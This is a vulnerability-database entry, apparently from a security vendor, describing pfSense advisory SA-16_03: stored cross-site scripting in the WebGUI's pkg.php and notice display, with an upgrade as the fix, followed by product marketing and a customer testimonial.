pfSense: pfSense-SA-16_03.webgui: Stored XSS in the pfSense WebGUI
Description
A Cross-Site Scripting (XSS) vulnerability was found in pkg.php, part of the pfSense WebGUI, on pfSense 2.3 and earlier versions. pkg.php is used to display and manage lists of items used by packages. Items in these lists were displayed without encoding, which could result in a stored XSS if the package did not validate or sanitize the data when values were stored. A Cross-Site Scripting (XSS) vulnerability was found in Notice handling, part of the pfSense WebGUI, affecting pfSense 2.3 only. The firewall displays notices formed by various areas of the system to notify the user of problems or significant events. The text of the notices was not encoded before display, leading to a potential persistent XSS. Due to the lack of proper encoding on the affected variables and pages, arbitrary JavaScript can be executed in the user's browser. The user's session cookie or other information from the session may be compromised. In the case of the potential Notices XSS vector, the notice text is not directly controllable by the user, but in certain cases it was filled with an HTML response from a remote server controlled by the pfSense project.
Solution(s)
- pfsense-upgrade-latest
- Lightweight Endpoint Agent
- Live Dashboards
- Real Risk Prioritization
- IT-Integrated Remediation Projects
- Cloud, Virtual, and Container Assessment
- Integrated Threat Feeds
- Easy-to-Use RESTful API
- Automation-Assisted Patching
- Automated Containment
With Rapid7 live dashboards, I have a clear view of all the assets on my network, which ones can be exploited, and what I need to do in order to reduce the risk in my environment in real-time. No other tool gives us that kind of value and insight.
– Scott Cheney, Manager of Information Security, Sierra View Medical Center